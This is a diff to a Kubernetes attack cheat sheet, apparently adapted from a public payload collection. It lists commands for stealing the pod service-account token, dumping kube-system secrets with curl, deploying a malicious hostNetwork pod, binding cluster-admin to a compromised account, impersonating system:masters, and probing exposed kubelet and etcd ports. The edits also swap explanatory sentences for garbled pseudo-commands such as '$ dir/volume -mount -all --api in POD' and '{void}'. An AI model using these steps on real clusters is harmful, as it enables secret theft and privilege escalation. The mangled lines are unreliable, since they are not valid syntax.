--- a/Google_Cloud/app-sec.yml
+++ b/Google_Cloud/app-sec.yml
@@ -1,6 +1,7 @@
 # Kubernetes
 
 > Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
+NOTE: Not virtual machines...Cloud-Sec
 
 ## Summary 
 
@@ -27,38 +28,30 @@
 
 ## Service Token
 
-> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod.
-
+> PODS (container-array) created by an auto-assigned, service-account. 
+> A new volume is created by containing public access token for Kubernetes API. 
+$ dir/volume -mount -all --api in POD 
 ```powershell
 $ cat /var/run/secrets/kubernetes.io/serviceaccount/token
-
-# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting
+# kubectl-cluster-compromise 
+# trivial, as it will use that service account token without additional prompting
 ```
-
 ## RBAC Configuration
-
 ### Listing Secrets
-
-An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace.
-
+> An attacker that gains access to list secrets in the cluster that can use the following curl commands to get all secrets in "kube-system" namespace.
 ```powershell
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
 ```
-
 ### Access Any Resource or Verb
-
 ```powershell
 resources:
 - '*'
 verbs:
 - '*'
 ```
-
 ### Pod Creation
-
-Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
-Then create a malicious pod.yaml file.
-
+$ `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
+$ dir /pod.yaml
 ```yaml
 apiVersion: v1
 kind: Pod
@@ -75,20 +68,14 @@ spec:
   automountServiceAccountToken: true
   hostNetwork: true
 ```
-
-Then `kubectl apply -f malicious-pod.yaml`
-
+{ Then, `kubectl apply -f malicious-pod.yaml` }
 ### Privilege to Use Pods/Exec
-
 ```powershell
 kubectl exec -it <POD NAME> -n <PODS NAMESPACE> –- sh
 ```
-
 ### Privilege to Get/Patch Rolebindings
-
-The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account. 
-Create a malicious RoleBinging.json file.
-
+$ --bind [ADMIN] "CluserRole"*[!]SERV.ACC
+$ RoleBinging.json
 ```powershell
 {
     "apiVersion": "rbac.authorization.k8s.io/v1",
@@ -111,89 +98,64 @@ Create a malicious RoleBinging.json file.
     ]
 }
 ```
-
+{void}
 ```powershell
 curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json
 curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
 ```
-
 ### Impersonating a Privileged Account
-
 ```powershell
 curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
 ```
-
 ## Privileged Service Account Token
-
 ```powershell
 $ cat /run/secrets/kubernetes.io/serviceaccount/token
 $ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
 ```
-
 ## Interesting endpoints to reach
-
 ```powershell
 # List Pods
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
-
 # List secrets
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
-
 # List deployments
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
-
 # List daemonsets
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
 ```
-
-
 ## API addresses that you should know 
-
 *(External network visibility)*
-
 ### cAdvisor
-
 ```powershell
 curl -k https://<IP Address>:4194
 ```
-
 ### Insecure API server
-
 ```powershell
 curl -k https://<IP Address>:8080
 ```
-
 ### Secure API Server
-
 ```powershell
 curl -k https://<IP Address>:(8|6)443/swaggerapi
 curl -k https://<IP Address>:(8|6)443/healthz
 curl -k https://<IP Address>:(8|6)443/api/v1
 ```
-
 ### etcd API
-
 ```powershell
 curl -k https://<IP address>:2379
 curl -k https://<IP address>:2379/version
 etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
 ```
-
 ### Kubelet API
-
 ```powershell
 curl -k https://<IP address>:10250
 curl -k https://<IP address>:10250/metrics
 curl -k https://<IP address>:10250/pods
 ```
-
 ### kubelet (Read only)
-
 ```powershell
 curl -k https://<IP Address>:10255
 http://<external-IP>:10255/pods
 ```
-
 
 ## References
 
